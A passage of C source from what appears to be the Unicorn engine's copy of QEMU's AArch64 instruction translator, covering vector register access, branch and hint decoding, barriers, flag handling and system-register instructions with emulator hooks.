tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_ld32u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_8|MO_SIGN: tcg_gen_ld8s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16|MO_SIGN: tcg_gen_ld16s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_32|MO_SIGN: tcg_gen_ld32s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_64: case MO_64|MO_SIGN: tcg_gen_ld_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } static void read_vec_element_i32(DisasContext *s, TCGv_i32 tcg_dest, int srcidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_ld8u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_ld16u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_8|MO_SIGN: tcg_gen_ld8s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16|MO_SIGN: tcg_gen_ld16s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_32: case MO_32|MO_SIGN: tcg_gen_ld_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } /* Set value of an element within a vector register */ static void write_vec_element(DisasContext *s, TCGv_i64 tcg_src, int destidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_st8_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_st16_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_st32_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_64: tcg_gen_st_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } static void write_vec_element_i32(DisasContext *s, TCGv_i32 tcg_src, int destidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_st8_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_st16_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); break; case MO_32: tcg_gen_st_i32(tcg_ctx, 
tcg_src, tcg_ctx->cpu_env, vect_off); break; default: g_assert_not_reached(); } } /* Store from vector register to memory */ static void do_vec_st(DisasContext *s, int srcidx, int element, TCGv_i64 tcg_addr, int size, MemOp endian) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_tmp, srcidx, element, size); tcg_gen_qemu_st_i64(tcg_ctx, tcg_tmp, tcg_addr, get_mem_index(s), endian | size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Load from memory to vector register */ static void do_vec_ld(DisasContext *s, int destidx, int element, TCGv_i64 tcg_addr, int size, MemOp endian) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_tmp, tcg_addr, get_mem_index(s), endian | size); write_vec_element(s, tcg_tmp, destidx, element, size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Check that FP/Neon access is enabled. If it is, return * true. If not, emit code to generate an appropriate exception, * and return false; the caller should not emit any code for * the instruction. Note that this check must happen after all * unallocated-encoding checks (otherwise the syndrome information * for the resulting exception will be incorrect). */ static inline bool fp_access_check(DisasContext *s) { assert(!s->fp_access_checked); s->fp_access_checked = true; if (!s->fp_excp_el) { return true; } gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false), s->fp_excp_el); return false; } /* Check that SVE access is enabled. If it is, return true. * If not, emit code to generate an appropriate exception and return false. */ bool sve_access_check(DisasContext *s) { if (s->sve_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_sve_access_trap(), s->sve_excp_el); return false; } return fp_access_check(s); } /* * This utility function is for doing register extension with an * optional shift. You will likely want to pass a temporary for the * destination register. See DecodeRegExtend() in the ARM ARM. */ static void ext_and_shift_reg(TCGContext *tcg_ctx, TCGv_i64 tcg_out, TCGv_i64 tcg_in, int option, unsigned int shift) { int extsize = extract32(option, 0, 2); bool is_signed = extract32(option, 2, 1); if (is_signed) { switch (extsize) { case 0: tcg_gen_ext8s_i64(tcg_ctx, tcg_out, tcg_in); break; case 1: tcg_gen_ext16s_i64(tcg_ctx, tcg_out, tcg_in); break; case 2: tcg_gen_ext32s_i64(tcg_ctx, tcg_out, tcg_in); break; case 3: tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); break; } } else { switch (extsize) { case 0: tcg_gen_ext8u_i64(tcg_ctx, tcg_out, tcg_in); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, tcg_out, tcg_in); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, tcg_out, tcg_in); break; case 3: tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); break; } } if (shift) { tcg_gen_shli_i64(tcg_ctx, tcg_out, tcg_out, shift); } } static inline void gen_check_sp_alignment(DisasContext *s) { /* The AArch64 architecture mandates that (if enabled via PSTATE * or SCTLR bits) there is a check that SP is 16-aligned on every * SP-relative load or store (with an exception generated if it is not). * In line with general QEMU practice regarding misaligned accesses, * we omit these checks for the sake of guest program performance. * This function is provided as a hook so we can more easily add these * checks in future (possibly as a "favour catching guest program bugs * over speed" user selectable option). */ } /* * This provides a simple table based table lookup decoder. 
It is * intended to be used when the relevant bits for decode are too * awkwardly placed and switch/if based logic would be confusing and * deeply nested. Since it's a linear search through the table, tables * should be kept small. * * It returns the first handler where insn & mask == pattern, or * NULL if there is no match. * The table is terminated by an empty mask (i.e. 0) */ static inline AArch64DecodeFn *lookup_disas_fn(const AArch64DecodeTable *table, uint32_t insn) { const AArch64DecodeTable *tptr = table; while (tptr->mask) { if ((insn & tptr->mask) == tptr->pattern) { return tptr->disas_fn; } tptr++; } return NULL; } /* * The instruction disassembly implemented here matches * the instruction encoding classifications in chapter C4 * of the ARM Architecture Reference Manual (DDI0487B_a); * classification names and decode diagrams here should generally * match up with those in the manual. */ /* Unconditional branch (immediate) * 31 30 26 25 0 * +----+-----------+-------------------------------------+ * | op | 0 0 1 0 1 | imm26 | * +----+-----------+-------------------------------------+ */ static void disas_uncond_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t addr = s->pc_curr + sextract32(insn, 0, 26) * 4; if (insn & (1U << 31)) { /* BL Branch with link */ tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } /* B Branch / BL Branch with link */ reset_btype(s); gen_goto_tb(s, 0, addr); } /* Compare and branch (immediate) * 31 30 25 24 23 5 4 0 * +----+-------------+----+---------------------+--------+ * | sf | 0 1 1 0 1 0 | op | imm19 | Rt | * +----+-------------+----+---------------------+--------+ */ static void disas_comp_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, rt; uint64_t addr; TCGLabel *label_match; TCGv_i64 tcg_cmp; sf = extract32(insn, 31, 1); op = extract32(insn, 24, 1); /* 0: CBZ; 1: CBNZ */ rt = extract32(insn, 0, 5); addr = s->pc_curr + sextract32(insn, 5, 19) * 4; tcg_cmp = read_cpu_reg(s, rt, sf); label_match = gen_new_label(tcg_ctx); reset_btype(s); tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ, tcg_cmp, 0, label_match); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } /* Test and branch (immediate) * 31 30 25 24 23 19 18 5 4 0 * +----+-------------+----+-------+-------------+------+ * | b5 | 0 1 1 0 1 1 | op | b40 | imm14 | Rt | * +----+-------------+----+-------+-------------+------+ */ static void disas_test_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int bit_pos, op, rt; uint64_t addr; TCGLabel *label_match; TCGv_i64 tcg_cmp; bit_pos = (extract32(insn, 31, 1) << 5) | extract32(insn, 19, 5); op = extract32(insn, 24, 1); /* 0: TBZ; 1: TBNZ */ addr = s->pc_curr + sextract32(insn, 5, 14) * 4; rt = extract32(insn, 0, 5); tcg_cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, tcg_cmp, cpu_reg(s, rt), (1ULL << bit_pos)); label_match = gen_new_label(tcg_ctx); reset_btype(s); tcg_gen_brcondi_i64(tcg_ctx, op ? 
TCG_COND_NE : TCG_COND_EQ, tcg_cmp, 0, label_match); tcg_temp_free_i64(tcg_ctx, tcg_cmp); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } /* Conditional branch (immediate) * 31 25 24 23 5 4 3 0 * +---------------+----+---------------------+----+------+ * | 0 1 0 1 0 1 0 | o1 | imm19 | o0 | cond | * +---------------+----+---------------------+----+------+ */ static void disas_cond_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int cond; uint64_t addr; if ((insn & (1 << 4)) || (insn & (1 << 24))) { unallocated_encoding(s); return; } addr = s->pc_curr + sextract32(insn, 5, 19) * 4; cond = extract32(insn, 0, 4); reset_btype(s); if (cond < 0x0e) { /* genuinely conditional branches */ TCGLabel *label_match = gen_new_label(tcg_ctx); arm_gen_test_cc(tcg_ctx, cond, label_match); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } else { /* 0xe and 0xf are both "always" conditions */ gen_goto_tb(s, 0, addr); } } /* HINT instruction group, including various allocated HINTs */ static void handle_hint(DisasContext *s, uint32_t insn, unsigned int op1, unsigned int op2, unsigned int crm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int selector = crm << 3 | op2; if (op1 != 3) { unallocated_encoding(s); return; } switch (selector) { case 0: // 0b00000: /* NOP */ break; case 3: // 0b00011: /* WFI */ s->base.is_jmp = DISAS_WFI; break; case 1: // 0b00001: /* YIELD */ /* When running in MTTCG we don't generate jumps to the yield and * WFE helpers as it won't affect the scheduling of other vCPUs. * If we wanted to more completely model WFE/SEV so we don't busy * spin unnecessarily we would need to do something more involved. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { s->base.is_jmp = DISAS_YIELD; } break; case 2: // 0b00010: /* WFE */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { s->base.is_jmp = DISAS_WFE; } break; case 4: // 0b00100: /* SEV */ case 5: // 0b00101: /* SEVL */ /* we treat all as NOP at least for now */ break; case 7: // 0b00111: /* XPACLRI */ if (s->pauth_active) { gen_helper_xpaci(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30]); } break; case 8: // 0b01000: /* PACIA1716 */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xa: // 0b01010: /* PACIB1716 */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xc: // 0b01100: /* AUTIA1716 */ if (s->pauth_active) { gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xe: // 0b01110: /* AUTIB1716 */ if (s->pauth_active) { gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0x18: // 0b11000: /* PACIAZ */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x19: // 0b11001: /* PACIASP */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]); } break; case 0x1a: // 0b11010: /* PACIBZ */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x1b: // 0b11011: /* PACIBSP */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, 
                     tcg_ctx->cpu_X[30], tcg_ctx->cpu_env,
                     tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]);
        }
        break;
    case 0x1c: // 0b11100: /* AUTIAZ */
        if (s->pauth_active) {
            gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env,
                             tcg_ctx->cpu_X[30], new_tmp_a64_zero(s));
        }
        break;
    case 0x1d: // 0b11101: /* AUTIASP */
        if (s->pauth_active) {
            gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env,
                             tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]);
        }
        break;
    case 0x1e: // 0b11110: /* AUTIBZ */
        if (s->pauth_active) {
            gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env,
                             tcg_ctx->cpu_X[30], new_tmp_a64_zero(s));
        }
        break;
    case 0x1f: // 0b11111: /* AUTIBSP */
        if (s->pauth_active) {
            gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env,
                             tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]);
        }
        break;
    default:
        /* default specified as NOP equivalent */
        break;
    }
}

static void gen_clrex(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1);
}

/* CLREX, DSB, DMB, ISB */
static void handle_sync(DisasContext *s, uint32_t insn,
                        unsigned int op1, unsigned int op2, unsigned int crm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGBar bar;

    if (op1 != 3) {
        unallocated_encoding(s);
        return;
    }

    switch (op2) {
    case 2: /* CLREX */
        gen_clrex(s, insn);
        return;
    case 4: /* DSB */
    case 5: /* DMB */
        switch (crm & 3) {
        case 1: /* MBReqTypes_Reads */
            bar = TCG_BAR_SC | TCG_MO_LD_LD | TCG_MO_LD_ST;
            break;
        case 2: /* MBReqTypes_Writes */
            bar = TCG_BAR_SC | TCG_MO_ST_ST;
            break;
        default: /* MBReqTypes_All */
            bar = TCG_BAR_SC | TCG_MO_ALL;
            break;
        }
        tcg_gen_mb(tcg_ctx, bar);
        return;
    case 6: /* ISB */
        /* We need to break the TB after this insn to execute
         * self-modifying code correctly and also to take
         * any pending interrupts immediately.
         */
        reset_btype(s);
        gen_goto_tb(s, 0, s->base.pc_next);
        return;
    case 7: /* SB */
        if (crm != 0 || !dc_isar_feature(aa64_sb, s)) {
            goto do_unallocated;
        }
        /*
         * TODO: There is no speculation barrier opcode for TCG;
         * MB and end the TB instead.
         */
        tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC);
        gen_goto_tb(s, 0, s->base.pc_next);
        return;
    default:
    do_unallocated:
        unallocated_encoding(s);
        return;
    }
}

static void gen_xaflag(TCGContext *tcg_ctx)
{
    TCGv_i32 z = tcg_temp_new_i32(tcg_ctx);

    tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, z, tcg_ctx->cpu_ZF, 0);

    /*
     * (!C & !Z) << 31
     * (!(C | Z)) << 31
     * ~((C | Z) << 31)
     * ~-(C | Z)
     * (C | Z) - 1
     */
    tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, z);
    tcg_gen_subi_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, 1);

    /* !(Z & C) */
    tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_ZF, z, tcg_ctx->cpu_CF);
    tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 1);

    /* (!C & Z) << 31 -> -(Z & ~C) */
    tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, z, tcg_ctx->cpu_CF);
    tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF);

    /* C | Z */
    tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, z);

    tcg_temp_free_i32(tcg_ctx, z);
}

static void gen_axflag(TCGContext *tcg_ctx)
{
    tcg_gen_sari_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 31); /* V ?
-1 : 0 */ tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_ctx->cpu_VF); /* C & !V */ /* !(Z | V) -> !(!ZF | V) -> ZF & !V -> ZF & ~VF */ tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_ctx->cpu_VF); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* MSR (immediate) - move immediate to processor state field */ static void handle_msr_i(DisasContext *s, uint32_t insn, unsigned int op1, unsigned int op2, unsigned int crm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1; int op = op1 << 3 | op2; /* End the TB by default, chaining is ok. */ s->base.is_jmp = DISAS_TOO_MANY; switch (op) { case 0x00: /* CFINV */ if (crm != 0 || !dc_isar_feature(aa64_condm_4, s)) { goto do_unallocated; } tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 1); s->base.is_jmp = DISAS_NEXT; break; case 0x01: /* XAFlag */ if (crm != 0 || !dc_isar_feature(aa64_condm_5, s)) { goto do_unallocated; } gen_xaflag(tcg_ctx); s->base.is_jmp = DISAS_NEXT; break; case 0x02: /* AXFlag */ if (crm != 0 || !dc_isar_feature(aa64_condm_5, s)) { goto do_unallocated; } gen_axflag(tcg_ctx); s->base.is_jmp = DISAS_NEXT; break; case 0x03: /* UAO */ if (!dc_isar_feature(aa64_uao, s) || s->current_el == 0) { goto do_unallocated; } if (crm & 1) { set_pstate_bits(tcg_ctx, PSTATE_UAO); } else { clear_pstate_bits(tcg_ctx, PSTATE_UAO); } t1 = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x04: /* PAN */ if (!dc_isar_feature(aa64_pan, s) || s->current_el == 0) { goto do_unallocated; } if (crm & 1) { set_pstate_bits(tcg_ctx, PSTATE_PAN); } else { clear_pstate_bits(tcg_ctx, PSTATE_PAN); } t1 = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x05: /* SPSel */ if (s->current_el == 0) { goto do_unallocated; } t1 = tcg_const_i32(tcg_ctx, crm & PSTATE_SP); gen_helper_msr_i_spsel(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x1e: /* DAIFSet */ t1 = tcg_const_i32(tcg_ctx, crm); gen_helper_msr_i_daifset(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x1f: /* DAIFClear */ t1 = tcg_const_i32(tcg_ctx, crm); gen_helper_msr_i_daifclear(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); /* For DAIFClear, exit the cpu loop to re-evaluate pending IRQs. 
*/ s->base.is_jmp = DISAS_UPDATE; break; default: do_unallocated: unallocated_encoding(s); return; } } static void gen_get_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); /* build bit 31, N */ tcg_gen_andi_i32(tcg_ctx, nzcv, tcg_ctx->cpu_NF, (1U << 31)); /* build bit 30, Z */ tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, tcg_ctx->cpu_ZF, 0); tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 30, 1); /* build bit 29, C */ tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tcg_ctx->cpu_CF, 29, 1); /* build bit 28, V */ tcg_gen_shri_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, 31); tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 28, 1); /* generate result */ tcg_gen_extu_i32_i64(tcg_ctx, tcg_rt, nzcv); tcg_temp_free_i32(tcg_ctx, nzcv); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_set_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) { TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); /* take NZCV from R[t] */ tcg_gen_extrl_i64_i32(tcg_ctx, nzcv, tcg_rt); /* bit 31, N */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, (1U << 31)); /* bit 30, Z */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv, (1 << 30)); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 0); /* bit 29, C */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, (1 << 29)); tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 29); /* bit 28, V */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, (1 << 28)); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 3); tcg_temp_free_i32(tcg_ctx, nzcv); } static TCGLabel *gen_hook_sys(DisasContext *s, uint32_t insn, struct hook *hk) { uc_engine *uc = s->uc; TCGContext *tcg_ctx = uc->tcg_ctx; TCGLabel *label = gen_new_label(tcg_ctx); TCGv_i32 tcg_skip, tcg_insn; TCGv_ptr tcg_hk; tcg_skip = tcg_temp_new_i32(tcg_ctx); tcg_insn = tcg_const_i32(tcg_ctx, insn); tcg_hk = tcg_const_ptr(tcg_ctx, (void*)hk); // Sync pc in advance. gen_a64_set_pc_im(tcg_ctx, s->pc_curr); // Only one hook per instruction for SYS/SYSL/MRS/MSR is allowed. // This is intended and may be extended if it's really necessary. gen_helper_uc_hooksys64(tcg_ctx, tcg_skip, tcg_ctx->cpu_env, tcg_insn, tcg_hk); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_skip, 0, label); tcg_temp_free_i32(tcg_ctx, tcg_skip); tcg_temp_free_i32(tcg_ctx, tcg_insn); tcg_temp_free_ptr(tcg_ctx, tcg_hk); return label; } static void may_gen_set_label(DisasContext *s, TCGLabel *label) { if (label) { gen_set_label(s->uc->tcg_ctx, label); } } /* MRS - move from system register * MSR (register) - move to system register * SYS * SYSL * These are all essentially the same insn in 'read' and 'write' * versions, with varying op0 fields. 
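 *
 * Concretely, op0 == 1 encodes SYS/SYSL and op0 == 2 or 3 encodes
 * MSR/MRS; the Unicorn hook dispatch below keys the
 * UC_ARM64_INS_MRS/MSR/SYS/SYSL cases on exactly this split.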
*/ static void handle_sys(DisasContext *s, uint32_t insn, bool isread, unsigned int op0, unsigned int op1, unsigned int op2, unsigned int crn, unsigned int crm, unsigned int rt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const ARMCPRegInfo *ri; TCGv_i64 tcg_rt; uc_engine *uc = s->uc; TCGLabel *label = NULL; struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, s->pc_curr)) { continue; } switch (hook->insn) { case UC_ARM64_INS_MRS: { if (isread && (op0 == 2 || op0 == 3)) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_MSR: { if (!isread && (op0 == 2 || op0 == 3)) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_SYSL: { if (isread && op0 == 1) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_SYS: { if (!isread && op0 == 1) { label = gen_hook_sys(s, insn, hook); } break; } default: break; } if (label) { break; } } ri = get_arm_cp_reginfo(s->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, crn, crm, op0, op1, op2)); if (!ri) { /* Unknown register; this might be a guest error or a QEMU * unimplemented feature. */ qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch64 " "system register op0:%d op1:%d crn:%d crm:%d op2:%d\n", isread ? "read" : "write", op0, op1, crn, crm, op2); unallocated_encoding(s); may_gen_set_label(s, label); return; } /* Check access permissions */ if (!cp_access_ok(s->current_el, ri, isread)) { unallocated_encoding(s); may_gen_set_label(s, label); return; } if (ri->accessfn) { /* Emit code to perform further access permissions checks at * runtime; this may result in an exception. */ TCGv_ptr tmpptr; TCGv_i32 tcg_syn, tcg_isread; uint32_t syndrome; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tmpptr = tcg_const_ptr(tcg_ctx, ri); syndrome = syn_aa64_sysregtrap(op0, op1, op2, crn, crm, rt, isread); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); tcg_isread = tcg_const_i32(tcg_ctx, isread); gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn, tcg_isread); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_isread); } else if (ri->type & ARM_CP_RAISES_EXC) { /* * The readfn or writefn might raise an exception; * synchronize the CPU state in case it does. */ gen_a64_set_pc_im(tcg_ctx, s->pc_curr); } /* Handle special cases first */ switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { case ARM_CP_NOP: may_gen_set_label(s, label); return; case ARM_CP_NZCV: tcg_rt = cpu_reg(s, rt); if (isread) { gen_get_nzcv(tcg_ctx, tcg_rt); } else { gen_set_nzcv(tcg_ctx, tcg_rt); } may_gen_set_label(s, label); return; case ARM_CP_CURRENTEL: /* Reads as current EL value from pstate, which is * guaranteed to be constant by the tb flags. */ tcg_rt = cpu_reg(s, rt); tcg_gen_movi_i64(tcg_ctx, tcg_rt, s->current_el << 2); may_gen_set_label(s, label); return; case ARM_CP_DC_ZVA: /* Writes clear the aligned block of memory which rt points into. 
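 * The block size is IMPLEMENTATION DEFINED and advertised to guests
 * via DCZID_EL0; gen_helper_dc_zva below performs the zeroing.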
*/ tcg_rt = clean_data_tbi(s, cpu_reg(s, rt)); gen_helper_dc_zva(tcg_ctx, tcg_ctx->cpu_env, tcg_rt); may_gen_set_label(s, label); return; default: break; } if ((ri->type & ARM_CP_FPU) && !fp_access_check(s)) { may_gen_set_label(s, label); return; } else if ((ri->type & ARM_CP_SVE) && !sve_access_check(s)) { may_gen_set_label(s, label); return; } tcg_rt = cpu_reg(s, rt); if (isread) { if (ri->type & ARM_CP_CONST) { tcg_gen_movi_i64(tcg_ctx, tcg_rt, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_ld_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); } } else { if (ri->type & ARM_CP_CONST) { /* If not forbidden by access permissions, treat as WI */ may_gen_set_label(s, label); return; } else if (ri->writefn) { TCGv_ptr tmpptr; tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_rt); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_st_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); } } if ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)) { /* I/O operations must end the TB here (whether read or write) */ s->base.is_jmp = DISAS_UPDATE; } if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { /* * A write to any coprocessor register that ends a TB * must rebuild the hflags for the next TB. */ TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, s->current_el); 